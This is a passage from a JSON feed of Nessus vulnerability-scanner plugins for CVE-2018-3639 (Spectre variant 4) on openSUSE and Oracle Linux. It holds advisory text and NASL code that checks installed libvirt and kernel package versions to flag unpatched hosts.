reference:\"libvirt-libs-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-lock-sanlock-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-lock-sanlock-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-nss-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-nss-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"wireshark-plugin-libvirt-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"wireshark-plugin-libvirt-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libvirt-client-32bit-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-libxl-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-libxl-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-storage-rbd-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-storage-rbd-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libvirt-daemon-xen-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libvirt-devel-32bit-4.0.0-lp150.7.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvirt / libvirt-admin / libvirt-admin-debuginfo / etc\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2020-02-01T01:06:44", "bulletinFamily": "scanner", "description": "This update for libvirt fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2018-3639: Add support for ", "modified": "2020-02-02T00:00:00", "id": "OPENSUSE-2018-860.NASL", "href": "https://www.tenable.com/plugins/nessus/111661", "published": "2018-08-13T00:00:00", "title": "openSUSE Security Update : libvirt (openSUSE-2018-860) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-860.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111661);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:08\");\n\n script_cve_id(\"CVE-2018-3639\");\n\n script_name(english:\"openSUSE Security Update : libvirt (openSUSE-2018-860) (Spectre)\");\n script_summary(english:\"Check for the openSUSE-2018-860 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libvirt fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2018-3639: Add support for 'ssbd' and 'virt-ssbd'\n CPUID feature bits to address V4 Speculative Store\n Bypass aka 'Memory Disambiguation' (bsc#1092885).\n\nBug fixes :\n\n - bsc#1094325: Enable virsh blockresize for XEN guests\n (FATE#325467).\n\n - bsc#1095556: Fix qemu VM creating with --boot uefi due\n to missing AppArmor profile.\n\n - bsc#1094725: Fix `virsh blockresize` to work with Xen\n qdisks.\n\n - bsc#1094480: Fix `virsh list` to list domains with `xl\n list`.\n\n - bsc#1087416: Fix missing video device within guest with\n default installation by virt-mamanger.\n\n - bsc#1079150: Fix libvirt-guests start dependency.\n\n - bsc#1076861: Fix locking of lockspace resource\n '/devcfs/disks/uatidmsvn1-xvda'.\n\n - bsc#1074014: Fix KVM live migration when shutting down\n cluster node.\n\n - bsc#959329: Fix wrong state of VMs in virtual manager.\n\nThis update was imported from the SUSE:SLE-12-SP3:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1074014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1076861\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1079150\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1087416\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1094325\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1094480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1094725\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=959329\"\n );\n # https://features.opensuse.org/325467\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://features.opensuse.org/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libvirt packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-admin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-client-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-config-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-config-nwfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-interface\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-interface-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-libxl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-libxl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-lxc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-lxc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-network-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-nodedev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-nodedev-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-nwfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-nwfilter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-qemu-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-secret\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-secret-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-disk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-disk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-iscsi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-iscsi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-logical\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-logical-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-mpath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-mpath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-rbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-rbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-scsi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-scsi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-uml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-uml-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-vbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-vbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-hooks\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-lxc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-uml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-vbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-lock-sanlock\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-lock-sanlock-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-nss-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-admin-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-admin-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-client-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-client-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-config-network-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-config-nwfilter-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-interface-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-interface-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-lxc-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-lxc-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-network-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-network-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-nodedev-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-nodedev-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-nwfilter-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-nwfilter-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-qemu-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-qemu-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-secret-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-secret-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-storage-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-storage-core-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-storage-core-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-storage-disk-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-storage-disk-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-storage-iscsi-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-storage-iscsi-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-storage-logical-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-storage-logical-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-storage-mpath-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-storage-mpath-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-storage-scsi-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-storage-scsi-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-uml-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-uml-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-vbox-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-driver-vbox-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-hooks-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-lxc-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-qemu-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-uml-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-daemon-vbox-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-debugsource-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-devel-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-libs-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-libs-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-lock-sanlock-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-lock-sanlock-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-nss-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libvirt-nss-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libvirt-client-debuginfo-32bit-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-libxl-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-libxl-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-storage-rbd-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-storage-rbd-debuginfo-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libvirt-daemon-xen-3.3.0-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libvirt-devel-32bit-3.3.0-18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvirt / libvirt-admin / libvirt-admin-debuginfo / libvirt-client / etc\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2020-02-01T01:33:15", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2018:1629 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor", "modified": "2020-02-02T00:00:00", "id": "ORACLELINUX_ELSA-2018-1629.NASL", "href": "https://www.tenable.com/plugins/nessus/109977", "published": "2018-05-23T00:00:00", "title": "Oracle Linux 7 : kernel (ELSA-2018-1629) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2018:1629 and \n# Oracle Linux Security Advisory ELSA-2018-1629 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109977);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"RHSA\", value:\"2018:1629\");\n\n script_name(english:\"Oracle Linux 7 : kernel (ELSA-2018-1629) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2018:1629 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor's data cache even\nfor speculatively executed instructions that never actually commit\n(retire). As a result, an unprivileged attacker could use this flaw to\nread privileged memory by conducting targeted cache side-channel\nattacks. (CVE-2018-3639)\n\nNote: This issue is present in hardware and cannot be fully fixed via\nsoftware update. The updated kernel packages provide software side of\nthe mitigation for this hardware issue. To be fully functional,\nup-to-date CPU microcode applied on the system is required. Please\nrefer to References section for further information about this issue,\nCPU microcode requirements and the potential performance impact.\n\nIn this update mitigations for x86-64 architecture are provided.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-May/007750.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 